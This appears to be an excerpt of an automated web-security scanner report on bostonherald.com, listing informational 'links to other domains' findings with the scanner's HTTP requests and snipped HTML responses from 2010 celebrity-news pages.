http://multimedia.heraldinteractive.com/images/20101029/stp/2f726d_Boch_10292010.jpg
http://multimedia.heraldinteractive.com/images/20101106/40baee_Riseman_11072010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /track/inside_track/view.bg?articleid=1294615&srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:46:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview%2F20101107we_hearernie_boch_jr_sean_duffy__more%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'We Hear: Ernie Boch Jr., Sean Duffy & more...');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1294615&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(8) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/40baee_Riseman_11072010.jpg" alt="Party gal Marilyn Riseman, left, and..." /></div>
...[SNIP]...
<a href="/track/inside_track/view/20101029ernie_boch_jr_goes_the_extra_automile_for_kids__music/"><img src="http://multimedia.heraldinteractive.com/images/20101029/stp/2f726d_Boch_10292010.jpg" alt="Ernie Boch Jr. goes the extra (Auto)Mile for kids & music" /></a>
...[SNIP]...

<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2Fview%2F20101107we_hearernie_boch_jr_sean_duffy__more%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.52. http://bostonherald.com/track/star_tracks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/track/star_tracks/?srvc=home&position=6

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/star_tracks/
http://multimedia.heraldinteractive.com/images/20101104/stp/7c9cdc_ltpdavid20101104.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/aecccd_nick_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/c828ae_consey_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/03570a_kanye_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/1289b4_michael_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/7c6917_demi_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/053430_Affleck_01302009.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/7a0ef9_Imus_09042009.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/c26f27_Weezy_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/d5c5f8_Tyler_09192010.JPG
http://multimedia.heraldinteractive.com/images/20101108/stp/4e5b50_lil_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/761463_al_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/8100ce_lily_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/98a2fb_emma_11082010.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /track/star_tracks/?srvc=home&position=6 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:49:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="Star Tracks - Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/star_tracks/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/track/star_tracks/view/20101108emma_watson_denies_nude_photos_are_of_her/"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/98a2fb_emma_11082010.jpg" alt="Emma Watson."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101108lil_wayne_is_free_but_at_what_price/"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/4e5b50_lil_11082010.jpg" alt="Lil Wayne."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101108al_roker_among_many_celebs_to_run_the_nyc_marathon/"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/761463_al_11082010.jpg" alt="Al Roker."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101108lily_allen_diagnosed_with_blood_poisoning/"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/8100ce_lily_11082010.jpg" alt="Lily Allen "></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/053430_Affleck_01302009.jpg" alt="Ben Affleck"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101107steven_tyler_not_sweating_kid_rock_snipe/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/d5c5f8_Tyler_09192010.JPG" alt="Steven Tyler"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101107lil_wayne_pops_bottles_post-release/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/c26f27_Weezy_11072010.jpg" alt="Lil Wayne"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101107don_imus_uncharitably_runs_mouth/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/7a0ef9_Imus_09042009.jpg" alt="Don Imus"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101106demi_moore_and_ashton_kutcher_fight_human_trafficking/"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/7c6917_demi_11062010.jpg" alt="Demi Moore (left) and Ashton Kutcher take part in a news conference held by the United Nations Office on Drugs and Crime (UNODC) about the launch of the UN Trust Fund for Victims of Human Trafficking, at United Nations headquarters."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101106more_troubles_for_kanye_west/"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/03570a_kanye_11062010.jpg" alt="Hip-hop artist Kanye West is pictured before a screening of ‘Runaway,’ a short film he directed that will accompany his forthcoming album ‘My Beautiful Dark Twisted Fantasy.’"></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101106michael_jacksons_album_to_be_released/"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/1289b4_michael_11062010.jpg" alt="In this CD cover image released by Epic Records, newly completed recordings from Michael Jackson entitled ‘Michael,’ is shown. The CD will be released on Dec.14. "></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101104david_cassidy_charged_with_dui_in_florida/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/7c9cdc_ltpdavid20101104.jpg" alt="In this undated photo provided by the Florida Highway Patrol, former ‘Partridge Family’ heartthrob David Cassidy is shown."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101105nick_lachey_is_engaged/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/aecccd_nick_11052010.jpg" alt="Nick Lachey and Vanessa Minnillo."></a>
...[SNIP]...
<a href="/track/star_tracks/view/20101105conan_obriens_former_stalker_is_back_in_town/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/c828ae_consey_11052010.jpg" alt="Conan O’Brien."></a>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.53. http://bostonherald.com/track/star_tracks/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/track/star_tracks/view.bg?articleid=1294606

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview.bg%3Farticleid%3D1294606%26srvc%3Dhome%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/star_tracks/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101029/stp/9270ed_Damon_10292010.jpg
http://multimedia.heraldinteractive.com/images/20101106/d5c5f8_Tyler_09192010.JPG
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /track/star_tracks/view.bg?articleid=1294606 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:56:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fstar_tracks%2Fview.bg%3Farticleid%3D1294606%26srvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Steven Tyler not sweating Kid Rock snipe');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1294606&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(3) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px solid rgb(102, 102, 102);" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_315x100_animated.gif"></a>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/d5c5f8_Tyler_09192010.JPG" alt="Steven Tyler" /></div>
...[SNIP]...
<a href="/track/inside_track/view/20101029tracked_down_matt_damon_steven_tyler_kendrick_perkins__more/"><img src="http://multimedia.heraldinteractive.com/images/20101029/stp/9270ed_Damon_10292010.jpg" alt="Tracked Down: Matt Damon, Steven Tyler, Kendrick Perkins & more..." /></a>
...[SNIP]...

<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
